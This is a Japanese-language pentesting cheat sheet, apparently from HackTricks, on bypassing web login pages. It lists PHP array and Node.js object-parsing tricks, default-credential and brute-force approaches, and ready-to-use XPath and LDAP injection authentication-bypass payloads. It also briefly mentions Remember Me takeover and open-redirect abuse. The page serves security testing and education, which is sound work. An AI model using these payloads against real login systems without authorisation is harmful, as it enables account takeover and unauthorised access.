Login Bypass

htARTE(HackTricks AWS Red Team Expert) でAWSハッキングをゼロからヒーローまで学びましょう

RootedCONスペインで最も関連性の高いサイバーセキュリティイベントであり、ヨーロッパでも最も重要なイベントの1つです。技術知識の促進を使命とするこの会議は、あらゆる分野のテクノロジーとサイバーセキュリティ専門家の熱い出会いの場です。

通常のログインをバイパスする

ログインページを見つけた場合、以下のいくつかのテクニックを試してバイパスできます:

  • ページ内にコメントがあるかどうかを確認します(下にスクロールして右に移動しますか?)

  • 制限されたページに直接アクセスできるかどうかを確認します

  • パラメータを送信しないで確認します(1つだけでも送信しない)

  • PHP比較エラーを確認します: user[]=a&pwd=buser=a&pwd[]=buser[]=a&pwd[]=b

  • コンテンツタイプをjsonに変更してjson値を送信します(bool trueを含む)

  • POSTがサポートされていないという応答を受け取った場合、Content-Type: application/jsonを使用してGETリクエストでJSONを本文に送信してみることができます

  • nodejsの潜在的な解析エラーを確認します(こちらを参照):password[password]=1

  • Nodejsはそのペイロードを次のようなクエリに変換します:SELECT id, username, left(password, 8) AS snipped_password, email FROM accounts WHERE username='admin' AND`` ``password=password=1; これにより、パスワード部分が常にtrueになります。

  • JSONオブジェクトを送信できる場合は、"password":{"password": 1}を送信してログインをバイパスできます。

  • このログインをバイパスするには、引き続き有効なユーザー名を知って送信する必要があります

  • mysql.createConnectionを呼び出す際に"stringifyObjects":trueオプションを追加すると、パラメータにObjectが渡された場合の予期しない動作をすべてブロックすることができます。

  • 資格情報を確認します:

  • 使用されている技術/プラットフォームのデフォルトの資格情報

  • 一般的な組み合わせ(root、admin、password、技術の名前、これらのパスワードの1つを持つデフォルトユーザー)。

  • Cewlを使用して辞書を作成し、デフォルトのユーザー名とパスワードを追加し、すべての単語をユーザー名とパスワードとして使用してブルートフォース攻撃を試みます

  • より大きな辞書を使用してブルートフォース攻撃を行います(Brute force

SQLインジェクション認証バイパス

ここで、SQLインジェクションを介してログインをバイパスするためのいくつかのトリックを見つけることができます

次のページでは、SQLインジェクションを介してログインをバイパスするためのカスタムリストを見つけることができます:

pageLogin bypass List

No SQLインジェクション認証バイパス

ここで、No SQLインジェクションを介してログインをバイパスするためのいくつかのトリックを見つけることができます

NoSQLインジェクションはパラメータの値を変更する必要があるため、手動でテストする必要があります。

XPathインジェクション認証バイパス

ここで、XPathインジェクションを介してログインをバイパスするためのいくつかのトリックを見つけることができます

' or '1'='1
' or ''='
' or 1]%00
' or /* or '
' or "a" or '
' or 1 or '
' or true() or '
'or string-length(name(.))<10 or'
'or contains(name,'adm') or'
'or contains(.,'adm') or'
'or position()=2 or'
admin' or '
admin' or '1'='2

LDAPインジェクション認証バイパス

ここでは、LDAPインジェクションを使用してログインをバイパスするためのいくつかのトリックを見つけることができます。

*
*)(&
*)(|(&
pwd)
*)(|(*
*))%00
admin)(&)
pwd
admin)(!(&(|
pwd))
admin))(|(|

Remember Me

ページに "Remember Me" 機能がある場合は、その実装方法を確認し、他のアカウントを 乗っ取る ことができるかどうかを調べてください。

Redirects

通常、ログイン後にページがユーザーをリダイレクトします。そのリダイレクトを変更して Open Redirect を引き起こすことができるかどうかを確認してください。ユーザーをあなたのウェブサイトにリダイレクトすることで、情報(コード、クッキーなど)を盗むことができるかもしれません。

その他のチェック

  • ログイン機能を悪用して ユーザー名を列挙 できるかどうかを確認してください。

  • パスワード/機密情報フォーム入力自動入力 が有効になっているかどうかを確認してください:<input autocomplete="false"

​​RootedCONスペイン で最も関連性の高いサイバーセキュリティイベントであり、ヨーロッパ でも最も重要なイベントの一つです。技術的知識の促進を使命とするこの会議は、あらゆる分野の技術とサイバーセキュリティ専門家にとっての熱い出会いの場です。

ゼロからヒーローまでのAWSハッキングを学ぶ htARTE(HackTricks AWS Red Team Expert)!

Last updated